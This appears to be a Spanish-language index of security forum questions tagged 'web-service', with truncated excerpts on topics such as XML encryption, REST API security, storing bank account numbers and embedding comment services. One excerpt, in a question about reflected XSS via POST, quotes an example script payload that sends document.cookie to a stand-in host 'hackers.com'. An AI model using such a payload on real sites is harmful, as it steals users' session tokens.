Preguntas con etiqueta 'web-service'

preguntas con etiqueta
2
respuestas

¿Qué es s3.amazonaws.com y por qué Chrome lo bloquea?

Últimamente, cada vez que hago clic en un enlace de descarga en Google Chrome, redirige a otro enlace que comienza con s3.amazonaws.com , que a su vez se bloquea por Chrome o por mi Antivirus (Comodo Internet Security). Copiando el mismo e...
hecha 05.04.2015 - 02:17
2
respuestas

¿Alguien usa el cifrado XML?

El estándar XML define un mecanismo para cifrar los datos en un documento XML. Es parte del estándar . ¿Alguien usa este formato de cifrado XML? ¿Hay algún sistema implementado significativo que use cifrado XML? ¿Se usa en la práctica o es s...
hecha 14.10.2012 - 22:00
1
respuesta

Ataque XSS reflejado mediante solicitud POST y carga útil XML

Sé que un XSS reflejado se puede hacer con una solicitud GET como: http://site.com?search=<script>location.href='http://hackers.com?sessionToken='+document.cookie;</script> Mientras la respuesta se vea similar a esto: <html...
hecha 15.09.2013 - 22:30
1
respuesta

Diseño de API PHP simple y seguro

Estoy tratando de diseñar un servicio web de API RESTful seguro con la menor cantidad posible de partes móviles. Tengo algunas preguntas y quiero asegurarme de que mi diseño sea seguro. Para el nivel de seguridad de la transmisión de datos, u...
hecha 04.04.2016 - 22:22
3
respuestas

Seguridad de extremo a extremo para los servicios REST, ¿algún estándar emergente?

Trabajo con la integración en el sector de la salud, donde la seguridad de extremo a extremo es importante. Nos integramos con numerosos servicios SOAP y utilizamos las funciones de seguridad de WS para cifrar y firmar solicitudes y respuestas....
hecha 12.10.2015 - 15:14
1
respuesta

Mostrar números de enrutamiento / cuenta de banco y almacenarlos de manera segura

EDITAR: Esto es para la región del Reino Unido / Europa. Me he estado rascando la cabeza leyendo otras publicaciones similares a esta sobre el almacenamiento seguro de números de cuenta y enrutamiento bancario. Sé que los números de enrutamie...
hecha 27.04.2015 - 13:09
2
respuestas

¿Existe una hoja de cálculo / plantilla para el Mapeo de Reglas de Autorización de Servicios Web?

Estoy buscando una hoja de cálculo / plantilla que permita mapear, visualizar y analizar las reglas de negocios (es decir, 'quién tiene acceso a qué'). En el pasado, he creado un par de estos (algunos incluso con automatización utilizando la...
hecha 04.05.2012 - 11:49
6
respuestas

¿Por qué alguien querría cifrar las fuentes RSS?

Escuché la idea de cifrar las fuentes RSS utilizando el sistema de cifrado de clave pública de alguien y desde entonces me intriga la idea. Pero luego comencé a preguntarme cuál sería la necesidad básica de que alguien cifrara sus feeds RSS, per...
hecha 07.01.2013 - 12:39
3
respuestas

servicios web: cómo evitar accesos ilegales

Según lo sugerido por alguien, publico una pregunta aquí (por primera vez). Estoy usando servicios web desde una aplicación de Android. Yo uso https (compré un certificado SSL). Quiero evitar accesos no deseados de otras personas que conocen...
hecha 13.02.2013 - 16:39
3
respuestas

¿Es un riesgo de seguridad incorporar un servicio de comentarios (como Disqus) en nuestro sitio?

¿Los servicios de comentarios como Disqus, IntenseDebate, etc. representan un riesgo de seguridad para las corporaciones? Editar: ¿Qué riesgos podrían surgir al integrar dichos servicios en sitios web corporativos?     
hecha 15.05.2012 - 22:55